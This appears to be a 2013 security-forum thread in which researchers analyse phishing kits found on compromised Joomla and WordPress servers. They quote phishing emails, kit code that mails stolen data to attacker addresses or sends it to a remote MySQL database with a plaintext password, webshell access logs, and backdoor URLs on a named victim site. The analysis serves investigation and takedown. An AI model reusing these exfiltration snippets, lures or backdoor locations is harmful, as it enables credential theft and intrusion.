 #17681  by Xylitol
 Sat Jan 12, 2013 9:11 am
Hello,
Paypal phishing from http://www.phishtank.com/phish_detail.p ... id=1693107 & http://www.phishtank.com/phish_detail.p ... id=1693117
https://www.virustotal.com/file/55e42a6 ... 357981400/ > 37/46
The compromised server runs Joomla 1.5.20 Stable Release [18-July-2010]. (cf: http://www.kernelmode.info/forum/viewto ... 410#p17684)

Rotators (samples attached):
http://www.firstimpressionsimageconsulting.com/wp-includes/SimplePie/Decode/HTML/
https://www.virustotal.com/url/d1fcd384 ... 357981771/ > 3/34 - https://www.virustotal.com/file/211a323 ... 357991052/ > 0/46

Mail source:
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 200.27.72.40) smtp.mailfrom=www-data@facultades.unab.cl; dkim=none header.d=Verifications.fr; x-hmca=none
X-SID-PRA: Paypal-Controle@Verifications.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: 46fshLWf29At5eVYkiBeHGu9IXh19AFI7C9HI+GKRmhxpVFESzdsucMZDzZUjdLfi+btiLsEsw4RlGxVEzvMqr15xEpZUiQSthTg3X+pIKDzyBY4Pah1C0a/BJko2DEYjgLhCI112CUCcCxXTAATCw==
Received: from smtp.unab.cl ([200.27.72.40]) by BAY0-MC3-F15.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Fri, 11 Jan 2013 17:21:14 -0800
Received: from facultades.unab.cl (egresados.unab.cl [200.27.73.19])
	by smtp.unab.cl (Postfix) with ESMTP id 8082D5E0CE3
	for <************@hotmail.fr>; Fri, 11 Jan 2013 22:18:04 -0300 (CLST)
Received: from www-data by facultades.unab.cl with local (Exim 4.63)
	(envelope-from <www-data@facultades.unab.cl>)
	id 1TtpjY-0003kN-DE
	for ************@hotmail.fr; Fri, 11 Jan 2013 22:18:04 -0300
To: ************@hotmail.fr
Subject: Urgents : Mettre à jour de vos informations personneles Paypal.fr !  [Urgent: update your Paypal.fr personal information!]
From:  <Paypal-Controle@Verifications.fr>
MIME-Version: 1.0
Content-Type: text/html
Message-Id: <E1TtpjY-0003kN-DE@facultades.unab.cl>
Date: Fri, 11 Jan 2013 22:18:04 -0300
Return-Path: www-data@facultades.unab.cl
X-OriginalArrivalTime: 12 Jan 2013 01:21:15.0216 (UTC) FILETIME=[1D922D00:01CDF063]


<br><br> <hr><br><br> <strong>DRS : Direction Régional de PayPal </strong><br>  [DRS: PayPal Regional Directorate]
resend.php:
$samaka = "asq01@hotmail.fr";
$subject = "Off $ip";
$from = "From: InfoRmation<google@gmail.com>";
$from .= "-Info\n";
mail($samaka,$subject,$message,$from); 
EDF phishing kit also attached:
https://www.virustotal.com/file/a533635 ... 357985290/ > 0/46
Phishtank: http://www.phishtank.com/phish_detail.p ... id=1693109
sniper.php:
<?php $to = "wait0all@gmail.com"; $ip = getenv("REMOTE_ADDR"
The following domain is related to this mail address: Alomarks.at
http://www.whoismind.com/whois/alomarks.at.html

Cielo: http://www.phishtank.com/phish_detail.p ... id=1693131
https://www.virustotal.com/file/b0fb27b ... 357988824/ > 5/46
$headers = "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: Cielo <desejovip@hotmail.com"; 
Banco do Brasil phishing: http://www.phishtank.com/phish_detail.p ... id=1693133
https://www.virustotal.com/file/688a4b1 ... 357989472/ > 0/46
(phish.zip attached)

The server was not only used for phishing but also as a spam relay.
https://www.virustotal.com/file/c6269c8 ... 357986539/ > 5/46 - https://www.virustotal.com/file/6646f43 ... 357987304/ > 9/46 (PHP.Mailer)
Also attached.

By reading the access/error log files, I suspect 41.249.93.120, who used the backdoors to browse the phish files and was the first to access them.
41.249.93.120 - - [01/Jan/2013:04:41:48 +1100] "GET /*********.php HTTP/1.1" 200 36209 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.93.120 - - [01/Jan/2013:04:39:47 +1100] "POST /media/*********/rsform_backup_2010-09-30_183530.php?x&action=upload&chdir=/home/gtmaustr/public_html/media/**************/ HTTP/1.1" 200 11887 "http
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/media/*********/imagens/pontabarramarela.png, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
[Tue Jan 01 04:35:41 2013] [error] [client 41.249.93.120] File does not exist: /home/gtmaustr/public_html/404.shtml, referer: http://www.gtmaustralia.com.au/media/*********/cc/css/padrao3.css
69.171.247.115 - - [01/Jan/2013:10:42:23 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.140.27.175 - - [03/Jan/2013:04:52:00 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.194.138 - - [03/Jan/2013:07:01:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
200.140.128.46 - - [04/Jan/2013:13:46:34 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/ HTTP/1.1" 200 14111 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.248.111.156 - - [06/Jan/2013:03:46:30 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
196.217.22.177 - - [07/Jan/2013:01:36:17 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14197 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
201.24.48.2 - - [07/Jan/2013:08:44:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
41.140.96.122 - - [07/Jan/2013:21:45:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8643 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.137.51.125 - - [09/Jan/2013:01:05:07 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 15203 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.249.80.218 - - [10/Jan/2013:04:50:48 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 12376 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.140.101.235 - - [10/Jan/2013:08:05:29 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 16950 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
186.215.83.228 - - [10/Jan/2013:08:29:16 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=backtool&chdir=/home/gtmaustr/public_html/media/" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
105.141.50.243 - - [10/Jan/2013:09:58:47 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.142.9.86 - - [10/Jan/2013:16:07:11 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 8607 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
105.139.10.216 - - [11/Jan/2013:01:06:34 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.115.245 - - [11/Jan/2013:02:48:02 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14371 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
69.171.237.11 - - [11/Jan/2013:03:40:37 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
41.250.159.131 - - [11/Jan/2013:03:40:38 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13565 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
41.250.159.131 - - [11/Jan/2013:03:44:24 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13613 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.24.120 - - [11/Jan/2013:08:09:05 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13564 "-" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
177.43.16.17 - - [11/Jan/2013:09:31:47 +1100] "GET /media/rsformbkp4ca44bd2799a5/rsform_backup_2010-09-30_183530.php?x&action=edit&chdir=/home/gtmaustr/public_html/media/&file=C.php HTTP/1.1" 200 19077 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.101 Safari/537.11"
105.137.137.86 - - [11/Jan/2013:13:05:31 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14216 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.143.4.42 - - [12/Jan/2013:00:45:23 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 11412 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.248.178.222 - - [12/Jan/2013:06:46:17 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14494 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.249.146.131 - - [12/Jan/2013:06:58:29 +1100] "GET /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14206 "-" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0"
105.139.9.75 - - [12/Jan/2013:12:55:20 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 14369 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
41.137.59.63 - - [12/Jan/2013:16:18:09 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 20120 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0.1"
46.165.221.230 - - [12/Jan/2013:18:09:41 +1100] "POST /media/rsformbkp4ca44bd2799a5/ms-files.php HTTP/1.1" 200 13090 "http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php" "Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0"
Some backdoors:
http://www.gtmaustralia.com.au/media/rsformbkp4ca44bd2799a5/ms-files.php
http://www.gtmaustralia.com.au/INSTALL.php
http://www.gtmaustralia.com.au/components/com_search/search.php
http://www.gtmaustralia.com.au/components/com_poll/router.php 
Attachments: 6 × infected (746 Bytes, 920.96 KiB, 1.43 MiB, 6.47 KiB, 735.88 KiB, 552.8 KiB)
 #17688  by unixfreaxjp
 Sat Jan 12, 2013 3:49 pm
Hi Xylit0l.

Bravo! You got all the necessary pieces hooked up.
Below are my additional thoughts:
1. Now we have the WordPress /wp-includes/SimplePie/ flaw case. The dork "wp-includes/SimplePie CVE" will bring up more info.
The original files are here: https://github.com/WordPress/WordPress/ ... /SimplePie
Anything other than these will be injected files.
2. As mentioned in the previous hacked case, the use of injection code like:
wp-includes/images/wlw/edfzefzefzefze.php?act=f&f=load.php&d=%2Fsrv%2Ffsugo%2Fwww%2Fwp-includes%2Fjs%2Ftinymce%2Ft..
will be a clue to grep for the characteristics of the hacker's method and grab the ID/IP.
3. This is now more than coincidence; the IP you mentioned belongs to Morocco:
inetnum:        41.140.0.0 - 41.140.255.255
netname:        IP_ADSL_MarocTelecom
descr:          IP_ADSL_MarocTelecom
country:        MA
admin-c:        SMT1-AFRINIC
tech-c:         DMT1-AFRINIC
status:         ASSIGNED PA
mnt-by:         ONPT-MNT
source:         AFRINIC # Filtered
parent:         41.140.0.0 - 41.143.255.255

person:         SEPFS Maroc Telecom
address:        Service Exploitation des PFS
address:        MAROC TELECOM
address:        Avenue de France AGDAL
address:        Immeuble DR Rabat
e-mail:         nocmt@menara.ma
phone:          +21237686318
nic-hdl:        SMT1-AFRINIC
source:         AFRINIC # Filtered

person:         DEMPFS Maroc Telecom
address:        Division Exploitation et maintenance des PFS
address:        MAROC TELECOM
address:        Avenue de France AGDAL
address:        Immeuble DR Rabat
e-mail:         nocmt@menara.ma
phone:          +21237686318
nic-hdl:        DMT1-AFRINIC
source:         AFRINIC # Filtered
So does the previous case where I mentioned the IP 41.137.57.60 to you, which is also a Moroccan IP:
inetnum:        41.137.56.0 - 41.137.57.255
netname:        INWI-PDSN1-Rabat001
descr:          This prefix is dedicated to mobile 3G Internet users on the capital Rabat and its surroundings
country:        MA
admin-c:        AN2-AFRINIC
tech-c:         AN2-AFRINIC
status:         ASSIGNED PA
mnt-by:         MCNET-MNT
source:         AFRINIC # Filtered
parent:         41.137.0.0 - 41.137.255.255

person:       Ahmed NASSIRI
address:      Angle Rue oumayma sayeh et mansour saadi
              quartier racine residence courteline casablanca
phone:        +212959230
fax-no:       +212390552
e-mail:       ahmed.nassiri@marocconnect.com
nic-hdl:      AN2-AFRINIC
source:       AFRINIC # Filtered
Both are using dynamic IP pools, which suggests dial-up users.
We're dealing with an ongoing action by Moroccan hackers that converts vulnerable WP sites into phishing sites now.
 #17690  by Xylitol
 Sat Jan 12, 2013 5:20 pm
Hello, broke into another compromised server used for phishing.
http://www.phishtank.com/phish_detail.p ... id=1693105

Server is running Joomla.
Shells can be found here: http://www.kernelmode.info/forum/viewto ... 410#p17689, the classic Backdoor.PHP.WebShell.BD....

Mail source:
x-store-info:fHNTDlzCF8Nxw6HwcfGQy+S7Ax/lqLSmNphQ3OF+T9E=
Authentication-Results: hotmail.com; spf=none (sender IP is 93.94.226.76) smtp.mailfrom=designfa@server45.firstfind.nl; dkim=none header.d=edf-internet.fr.firstfind.nl; x-hmca=none
X-SID-PRA: noreply@edf-internet.fr.firstfind.nl
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0wO0Q9MjtHRD0yO1NDTD00
X-Message-Info: 5cuOr7VrmjApcnel9NDHJCECoyDEob6h2Gpg4EEc6it5atrg7ONrBUsfqShRqM9AS4egAorDiPL6mXa5ftD68Kx9DY/CeDjEtJ7TsRzUfPCINDv7CFmEBuRUErUgj02se+HExEOBrwrwvKw0h8PpgfRF6C450zw2
Received: from server45.firstfind.nl ([93.94.226.76]) by BAY0-MC3-F5.Bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Thu, 10 Jan 2013 07:47:31 -0800
Received: from server45.firstfind.nl (localhost [127.0.0.1])
	by server45.firstfind.nl (8.14.3/8.14.3/Debian-9.4) with ESMTP id r0AFlUSr027387
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NOT)
	for <************@hotmail.fr>; Thu, 10 Jan 2013 16:47:30 +0100
Received: (from designfa@localhost)
	by server45.firstfind.nl (8.14.3/8.14.3/Submit) id r0AFlUnX027386;
	Thu, 10 Jan 2013 16:47:30 +0100
Date: Thu, 10 Jan 2013 16:47:29 +0100
To: ************@hotmail.fr
From: noreply@edf-internet.fr.firstfind.nl
Reply-to: noreply@edf-internet.fr.firstfind.nl
Subject: Bleu Ciel d'EDF - Votre-Facture: (Y1-FT-TT-09-U3)  [EDF Bleu Ciel - Your invoice: (Y1-FT-TT-09-U3)]
Message-ID: <07e3df1f477fb4022e91dd0899b91df0@www.design-factory-verbaarschot.nl>
X-Priority: 1
X-Mailer: PHPMailer [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
X-Virus-Scanned: by amavisd-new
Return-Path: designfa@server45.firstfind.nl
X-OriginalArrivalTime: 10 Jan 2013 15:47:32.0083 (UTC) FILETIME=[CD5F2C30:01CDEF49]

<div class="mail-content-read" id="message">
<img style="text-align: center; font-size: 15px;" alt="vente-privee.com" src="" height="" width="">
<div></div><!-- END : Bandeau --><!-- BEGIN : title next Sales -->
<div> </div>
<div> </div>

	
<a href="http://fogosh.com/database/service_edf_enligne_145_uoe74/" target="_blank"><img alt="" src="http://panachepictures.co.uk/EDF.png"><br>

<img style="text-align: center; font-size: 18px;" alt="vente-privee.com" src="" height="" width="">
<div></div>

    </a><div></div><!-- END : Bandeau --><!-- BEGIN : title next Sales --><table cellpadding="0" cellspacing="0" width="588">
  <tbody>

</tbody></table>
<table cellpadding="0" cellspacing="0" width="588">
  <tbody>
  <tr>
       <td style="height: 0px;" height="15"></td></tr></tbody></table><!--Fin de creation des bandeaux des ventes futures--><!--Debut Pied de page --><!-- END : next Sales --><a style="color: rgb(242, 30, 140);" href="C:UsersAdministratorDocumentsSarbacane%203CampaignsDemo%20campaignHtmlCachehttp___mailing.vente-privee.com_r__id=h712fcab9,e1de309,e1de35d&p1=www.vente-privee.com_vp4" _label="Aide" target="_blank"><font color="#ffffff">.</font></a>   <font color="#ffffff">|</font>  <a style="color: rgb(242, 30, 140);" href="C:UsersAdministratorDocumentsSarbacane%203CampaignsDemo%20campaignHtmlCachehttp___mailing.vente-privee.com_r__id=h712fcab9,e1de309,e1de359&p1=fr.vente-privee.com_ExternalLinks_AutoLogin.ashx_i=0_H6wwchdE0y2_YmuklX2oBwBWBwFIdQHSY2qLCChGsLOCwDCLwWmJMVg9_cUit8z56nWjr51yL+H7YcVicfqJx6PXpMJTCYCXDVsjFEAt0iLUlLX7lq1g==" _label="Parrainage" target="_blank"><font color="#ffffff">Parrainer</font> <font color="#ffffff">mes</font> <font color="#ffffff">.</font></a>  <f!
 ont color="#ffffff">|</font>  <a style="color: rgb(242, 30, 140);" href="C:UsersAdministratorDocumentsSarbacane%203CampaignsDemo%20campaignHtmlCachehttp___mailing.vente-privee.com_r__id=h712fcab9,e1de309,e1de35a&p1=fr.vente-privee.com_ExternalLinks_AutoLogin.ashx_i=0_H6wwchdE0y2_YmuklX2oBwBWBwFIdQHSY2qLCChGsLOCwDCLwWmJMVg9_cUit8iZ+F8IyGOpKk5ZTurAZ_RvvEhn5vpDF4arGKf_5NPp5tSuqWNTNiIQ_Cp4EnoHbBmJjJqD0wEItnDicwaxvinQvmGuTrJdczlhQth9AHeP6tv5xkJ3sCyA==" _label="Ne plus recevoir nos offres" target="_blank"> <font color="#ffffff">.</font> 

<font color="#ffffff">.</font>
EDF targeted for phishing.
The log files were cleaned so... I'm angry. Only victims and my IP...

index3.php:
$myemail="jinshoori@gmail.com,t0od@hotmail.fr";
And used as a spam relay here again:
https://www.virustotal.com/file/41b5f57 ... 358010960/ > 4/46

Remember when I saturated an EDF phishing server?
http://www.kernelmode.info/forum/viewto ... 410#p17618
It's probably the same guys.
Attachments: 4 × infected (21.36 KiB, 190.57 KiB, 124.39 KiB, 246.14 KiB)
 #17691  by unixfreaxjp
 Sat Jan 12, 2013 6:25 pm
Same guys "from Morocco" (see the IPs of the 2 cases), they are being blacklisted now; they are dial-up users of the local telecom anyway, so
more of these incidents will happen for sure.

Xylit0l, if we can pass the exact time and IP access log we discussed before to the authorities then
the Moroccan police can coordinate with the Telecom/ISP to nail this guy.

BTW, can kernelmode posts be viewed by non-members?
If so, that is the explanation for the erasing of the log.
 #17692  by Xylitol
 Sat Jan 12, 2013 6:30 pm
I've already contacted the French police and EDF about these.
For kernelmode posts, yes, they can be viewed by non-members.
Explanation of erasing the log: I don't understand what you say?

Also, u.php (attached) is an archive unzipper, probably used by the hacker to unzip phishing stuff uploaded with a WSO shell.

And another phish, loginAction.action.php:
$myemail = "jinshoori@gmail.com"; //email hna 
Attachments: 1 × infected (29.04 KiB)
 #17706  by Xylitol
 Mon Jan 14, 2013 8:51 am
Hello, the previous EDF phish servers are under investigation now.
Also found new Paypal phishing via markusg, targeting German people on another compromised server running WordPress. http://www.phishtank.com/phish_detail.p ... id=1694455
Shells can be found here: http://www.kernelmode.info/forum/viewto ... =10#p17705

No mail address this time; user details are sent to a MySQL db on another server.
mysql_connect("193.107.19.***", "ccs", "LTBDVQ7bYewff5Dc");
        mysql_select_db("ccs");
        $url = mysql_real_escape_string($_S
'ccs' makes me think 'credit card sell'.
On the server where the data are sent the hacker has a parser for credit cards.
Phish pages attached.

The server was also used for spam.
https://www.virustotal.com/file/48544cc ... 358153370/ > 5/46
Additional stuff attached.
Attachments: 2 × infected (8.96 KiB, 1.11 MiB)
 #17887  by Xylitol
 Sun Jan 27, 2013 12:10 pm
CAF + EDF phishing dumped

Phishing redirector: http://www.phishtank.com/phish_detail.p ... id=1711740
https://www.virustotal.com/url/66f14aa1 ... 359285567/ > 0/33

CAF: http://www.phishtank.com/phish_detail.p ... id=1711743
$MooT   .= "blackdevilops@gmail.com";
$Meknes .= "------------------------------\n";

$s4iir = "CAF REZULT";
$sii = "From:$fr<lawie@caf-sem.fr>";

mail($MooT,$s4iir,$Meknes,$sii); 
EDF: http://www.phishtank.com/phish_detail.p ... id=1711741
$zobob .= "blackdevilops@gmail.com";
$zobab .= "------------------------------\n";

$s4wir = "[FR]--->$zabab | $fr";

$sii = "From: Particulier Rezult<root@edf.com>"; 
Mail Source:
x-store-info:J++/JTCzmObr++wNraA4Pa4f5Xd6uensydyekesGC2M=
Authentication-Results: hotmail.com; spf=none (sender IP is 64.29.144.244) smtp.mailfrom=pr-fit.co.uk@carrierzone.com; dkim=none header.d=bleu.ciel.fr; x-hmca=none
X-SID-PRA: Interface@bleu.ciel.fr
X-AUTH-Result: NONE
X-SID-Result: NONE
X-Message-Status: n:n
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTE7YT0xO0Q9MTtHRD0xO1NDTD0z
X-Message-Info: aKlYzGSc+LnEQMEKl4sGV8t2ShvSJdjD2fIjeCBUtTPgtL1h6SKfceAFCZGw5S4SGmgQKRvRqWRZ6EKrvingqxV8TFCU42MR7g2uQZx5ZX33fUiERm14X/F9BEBR/bnp6TzOpHz9tb1kB4IeTOT3hH/Ij09bTMW5
Received: from mailrelay2c25.carrierzone.com ([64.29.144.244]) by COL0-MC4-F28.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);
	 Sat, 26 Jan 2013 05:53:10 -0800
Received: from web163c30.carrierzone.com (web163c30.carrierzone.com [69.49.117.173])
	by mailrelay2c25.carrierzone.com (8.13.6/8.13.1) with ESMTP id r0QDr89e006554
	for <*************@hotmail.fr>; Sat, 26 Jan 2013 08:53:08 -0500
Received: from web163c30.carrierzone.com (localhost [127.0.0.1])
	by web163c30.carrierzone.com (8.13.6/8.12.6/SuSE Linux 0.6) with ESMTP id r0QDr8P6018393
	for <*************@hotmail.fr>; Sat, 26 Jan 2013 13:53:08 GMT
Received: (from pr-fit.co.uk@localhost)
	by web163c30.carrierzone.com (8.13.6/8.12.6/Submit) id r0QDr8Vn018392;
	Sat, 26 Jan 2013 13:53:08 GMT
Date: Sat, 26 Jan 2013 13:53:08 +0000
To: *************@hotmail.fr
From: Interface@bleu.ciel.fr
Reply-to: Interface@bleu.ciel.fr
Subject: =?iso-8859-1?Q?Avis_de_coupure:_probl=E8me_technique_sur_le_systeme_de_pr?=
 =?iso-8859-1?Q?=E9l=E8vement_automatique_-_Espace_Client_-_Janvier_2013?=
 [decoded: "Avis de coupure: problème technique sur le systeme de prélèvement automatique - Espace Client - Janvier 2013", i.e. Disconnection notice: technical problem with the direct-debit system - Customer Area - January 2013]
Message-ID: <9ef8d6df22ef288cffbc3eab4f41ffc9@www.pr-fit.co.uk>
X-Priority: 3
X-Mailer: PHPMailer [version ]
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset="iso-8859-1"
X-CSC: 0
X-CHA: v=1.1 cv=YoxKUmeBphtliiuLKtTANbN4Bi4MUMO3GjZLVvBH9Ts= c=1 sm=1
		a=p0EDqwt2g-YA:10 a=jPJDawAOAc8A:10 a=8nJEP1OIZ-IA:10 a=-uxG0W0WAAAA:8
		a=wwmC1az3AAAA:8 a=AXohNxyG3XavjBJh5ykA:9 a=wPNLvfGTeEIA:10
		a=tXsnliwV7b4A:10 a=Kyz4R7H7QncA:10 a=spzXjULuW0IVPiXG:21
		a=i/V8Wv9NnezdD4t9MK0P5A==:117
Return-Path: pr-fit.co.uk@carrierzone.com
X-OriginalArrivalTime: 26 Jan 2013 13:53:11.0004 (UTC) FILETIME=[7A7599C0:01CDFBCC]

<b>Your Customer Area</b> <br>
<br>
<b style="font-size:12px"><span>Hello</span> Mrs, Mr.</b><p></p>
<p>
<span style="font-size:12px"><span style="color:rgb(51,51,51);line-height:15px;font-family:Arial">This email is sent to you as a final notice, after several unsuccessful attempts to reach you on your personal number.<br style="line-height:15px">
Indeed, on 24/01/2013 an error occurred during the direct debit of the monthly instalment from your account; it was debited twice for the sum of fifty-nine eighty </span><span style="line-height:15px;font-family:Arial">59.80</span> <span style="color:rgb(51,51,51);line-height:15px;font-family:Arial"> (29.90*2)<br style="line-height:15px">
For an immediate regularisation of your situation, and the refund of the debited sum, you must urgently fill in the form below.</span> <font style="font-weight:normal;word-spacing:0px;text-transform:none;color:rgb(0,0,0);text-indent:0px;line-height:normal;font-style:normal;white-space:normal;letter-spacing:normal;font-variant:normal" color="black" face="Arial" size="1"> <span style="font-size:9pt;color:black;line-height:15px;font-family:Arial"> </span></font></span><br style="line-height:15px">
<span style="font-size:12px"> To <span>activate your Customer Area, click on the following link:</span></span></p>


 



<br>
<table background="https://monagencepart.edf.fr/ASPFront/campaigns/emails/images//bg-code.jpg" bgcolor="#345ca3" border="0" cellpadding="15" cellspacing="0" width="570">
<tbody>
<tr>
<td style="color:#fff" align="center">
<b><a class="ecxc_nobdr ecxt_prs" href="http://www.dorioone.ee/us.php" rel="nofollow" style="color:#fff" target="_blank"> Activate my Customer Area</a></b></td>
</tr>
</tbody>
</table>




<br>
<p>
<span style="display:inline!important;word-spacing:0px;font:12px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal">Thank you for your understanding. Upon receipt of your form we will contact you on the number you provide.</span><br style="word-spacing:0px;font:12px/15px Arial,Helvetica,sans-serif;text-transform:none;color:rgb(0,0,0);text-indent:0px;white-space:normal;letter-spacing:normal">
